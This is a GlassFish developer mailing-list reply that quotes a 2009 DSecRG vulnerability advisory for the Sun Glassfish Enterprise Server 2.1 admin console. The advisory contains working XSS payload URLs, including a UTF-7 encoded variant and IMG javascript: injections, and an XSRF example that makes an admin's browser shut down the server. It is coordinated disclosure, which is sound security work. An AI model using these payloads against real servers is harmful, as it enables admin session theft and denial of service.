Thank you for looking into these and reporting it to us. We will
investigate these and try to address these as soon as possible.
Thanks
Shreedhar
DSecRG wrote:
> Hello,We are security researchers from Digital Security company
> [http://dsecrg.com].
> We found a critical vulnerability in your system Sun Glassfish Enterprise Server
>
> This advisory is being provided to you under the policy documented at
> http://dsecrg.com/files/DSPolicy_en.pdf. We recommend you to read this policy; however, in the interim, you have 7 days to respond to this initial email. This policy encourages open communication, and we forward to working with you on resolving the problem detailed below.
>
>
>
> Digital Security Research Group [DSecRG] Advisory #DSECRG-09-0
>
>
> Application: Sun Glassfish Enterprise Server
> Versions Affected: 2.1
> Vendor URL: https://glassfish.dev.java.net/
> Bug: Multiple XSS and XSRF Vulnerabilities
> Exploits: YES
> Reported: 18.03.2009
> Vendor response: ..2009
> Solution: ..
> Date of Public Advisory: ..
> CVE-numbers: ..
> Author: Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)
>
>
>
> Description
> ***********
>
> 1. Glassfish Server Admin Console multiple XSS vulnerabilities.
> 2. Glassfish Server Admin Console shutdown server XSRF vulnerability.
>
>
>
> Details
> *******
>
> 1. Glassfish Server Admin Console multiple XSS vulnerabilities.
>
> Using this vulnerability attacker can steal admin's cookie and then
> authentificate as administrator or perform certain administrative
> actions.
>
> 1.1 Multiple Linked XSS vulnerabilities.
>
> Many pages have typical XSS vulnerability.
>
> Attacker can inject XSS in URL string.
>
> Example:
>
> http://[server]/applications/applications.jsf?');};alert("DSecRG_XSS");</script><!--
> http://[server]/configuration/configuration.jsf?');};alert("DSecRG_XSS");</script><!--
> http://[server]/customMBeans/customMBeans.jsf?');};alert("DSecRG_XSS");</script><!--
> http://[server]/resourceNode/resources.jsf?');};alert("DSecRG_XSS");</script><!--
> http://[server]/sysnet/registration.jsf?');};alert("DSecRG_XSS");</script><!--
> http://[server]/webService/webServicesGeneral.jsf?');};alert("DSecRG_XSS");</script><!--
>
> Response HTML Code:
> -------------------
> #################################################
>
> ...
> <script type="text/javascript">
> var myonload = new Object();
> myonload.oldonload = window.onload;
> myonload.newonload = function() {
> if ('/applications/applications.jsf?');};alert("DSecRG_XSS");</script><!--' != '') {
> ...
>
> #################################################
>
>
> 1.2 Multiple Linked XSS vulnerabilities in 404 Error page.
>
> Attacker can inject XSS in URL string using UTF-7 encoding.
>
> Exploiting this issue required Auto-Select encoding in browser
> configuration.
>
> Example:
>
> http://[server]/theme/META-INF/>+ACJ-+AD4APB-SCRIPT+AD7-alert(+ACI-DSecRG_XSS+ACI-)+ADz-/SCRIPT+AD7-
>
>
> 1.3 Multiple Linked XSS vulnerabilities in GET parameter "name".
>
> Many pages have typical XSS vulnerability in GET parameter "name".
>
> Attacker can inject XSS in URL string.
>
> Example:
>
> http://[server]/configuration/auditModuleEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')>
> http://[server]/configuration/httpListenerEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')>&configName=server-config
> http://[server]/resourceNode/jdbcResourceEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')>
>
>
> ---------------------------------------------------------------------
>
>
> 2. Glassfish Server Admin Console shutdown server XSRF vulnerability.
>
> Exploiting this issue allow a remote attacker to shutdown server.
>
> Example:
>
> http://[server]/applications/applications.jsf?<script>document.location.href="http://[server]/shutdown.jsf";</script>
>
>
>
> About
> *****
>
> Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
>
>
> Contact: research [at] dsecrg [dot] com
> http://www.dsecrg.com
> http://www.dsec.ru
>
>
> Regards,
> Digital Security Research Group [DSecRG]
> ________________________________________
> DIGITAL SECURITY
> tel/fax: +7(812)703-1547
> tel: +7(812)430-9130
> e-mail: research_at_dsecrg.com
> web: www.dsecrg.com
> ----------------------------------------
> This message and any attachment are confidential and may be privileged
> or otherwise protected from disclosure. If you are not the intended
> recipient any use, distribution, copying or disclosure is strictly
> prohibited. If you have received this message in error, please notify
> the sender immediately either by telephone or by e-mail and delete this
> message and any attachment from your system. Correspondence via e-mail
> is for information purposes only. Digital Security neither makes nor
> accepts legally binding statements by e-mail unless otherwise agreed.
> ----------------------------------------
>
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: dev-unsubscribe_at_glassfish.dev.java.net
> For additional commands, e-mail: dev-help_at_glassfish.dev.java.net
>
>